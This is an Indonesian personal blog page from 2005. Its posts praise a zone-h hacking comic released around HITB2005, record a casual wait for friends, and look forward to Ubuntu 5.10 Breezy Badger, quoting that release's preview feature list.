    Judul dari komik ke-3 yang di terbitkan zone-h ini di rilis bertepatan dengan acara HITB2005 yang baru selesai di laksanakan beberapa hari yang lalu , wah setelah membaca edisi ketiga ini ternyata aku makin melihat keseriusan Roberto Preatoni a.ka SyS64738 dalam membuat komik hacking, soalnya antara ketiga episode di komik ini saling berhubungan dan di garap dengan sangat serius(ck.. ck ..ck salut euy .. bikin komik ? hacker ? ), hehehe dan ternyata disini di kasih tau kenapa "spoonfork" (HITB guys) dapet nama itu ? padahal dah ketemu orangnya (@BCS2005) tapi tetep gak tau , n ternyata dia "jago" lock picking ..ehheheh.. (bener gak yah ?), disini juga "creator" NMAP ikut nampil .. ehheheh , buat yang mo baca langsung aja ke http://www.zone-h.org/comics/ , pokoknya TOP abis degh *_^

    ide ceritanya tentang Clustering , nah tapi disini yang di Cluster adalah "Mind" .[silly question , apa pake openmindsix [plesetan dari openmosix project :P] yah clusteringnya , hehehehe , ada ada aja :p

    time?

    2 comments
    lagi d cipes nih , nungguin anak anak echo [staff echo] yang janjiannya jam 11 tapi belon pada nonggol ;p

    agile-nya gak mau konek di xda gw, jabber-nya jg susah apa pd ngambek yah , untung ada pocketblogger ini jadinya bs curhat, woi ... pada kemana ? woiiiiii...eh ini 0byt3 br nonggol ma bu chika ;p

    Saturday, October 01, 2005

    Breezy Badger

    2 comments
    Nungguin release resmi Ubuntulinux 5.10 (Breezy Badger) yang katanya dilakukan di bulan oktober membuat gw bersemangat untuk berkunjung ke situsnya di ubuntulinux.org pas tanggal 1 oktober teng (biarin deh soal BBM :P apalagi soal G30S PKI :P ... tauk ach) , tapi pas gw pantengin kesitusnya ternyata belun ada , mo donlod preview releasenya nanggung juga (mending donlod yang public release aja sekalian), mo minta kirimin cd-nya tetep aja males karena perlakuan "oknum" bea cukai dan PT.POS, jadinya biarin deh GPRS ma server-junk gw lembur ampe 3 malem (pas gw donlod .iso whax)

    apa sih yang menarik di release terbaru ubuntu ini , cek this out !
    About Ubuntu 5.10 Preview
    -------------------------

    To see it all, you'll need to try the CD, but the highlights
    include:

    On the Desktop

    * GNOME 2.12 -- Very fresh... Released yesterday!!
    * OpenOffice.org 2.0 beta 2
    * X.org 6.8.2 with wider hardware support
    * An enhanced tool for easily installing new applications
    (see "Add/Remove Programs" in the System Administration menu)
    * A new tool which makes it easy to install support for
    multiple languages (Language Selector)
    * Editable GNOME menus
    * Applications are now linked into the Launchpad infrastructure
    (new entries on the Help menus for translation and support)
    * Support for writing audio CDs (Serpentine)
    * Graphical boot process with progress bar (USplash)

    On the Server

    * PHP5
    * Support for installing directly onto LVM volumes
    * Built-in thin client functionality produced in cooperation
    with the LTSP project (http://wiki.ubuntu.com/ThinClientHowto)
    * Simple NFS root setup with automatic hardware detection
    through initramfs-tools
    * Support for up to 4 gigabytes of RAM by default on 32-bit
    architectures
    * Kernel support for cluster filesystems (OCFS2 and GFS)

    Hardware Support Improvements

    * Linux 2.6.12.5 with many updated drivers from third parties
    * Further enhancements to laptop support (hot keys,
    and working suspend/resume on more models)
    * HP all-in-one printer/scanner devices are supported out of
    the box
    * Bluetooth input devices (such as keyboards and mice) are
    supported out of the box
    * Multiple audio devices are handled more gracefully (and one
    can easily select the default device)
    * 64-bit PowerPC kernel available

    Installation

    * A new OEM mode to simplify the process of preinstalling
    Ubuntu on computers for resale or redistribution
    * Automatically makes existing hard drive partitions available
    to the desktop
    * Simple "dual boot" configuration with automatic resizing of
    an existing installed OS
    * The second stage of the installation now has a progress bar

    "Under the hood"

    * GCC 4.0.1
    * glibc 2.3.5
    * New early userspace infrastructure based on initramfs-tools
    * More modular X.org packaging

    As always, Ubuntu includes the very best of the 100% FREE / LIBRE
    application software world, and each new release incorporates
    countless new features and bugfixes from the global development
    community.
    so ??, long live Ubuntu !!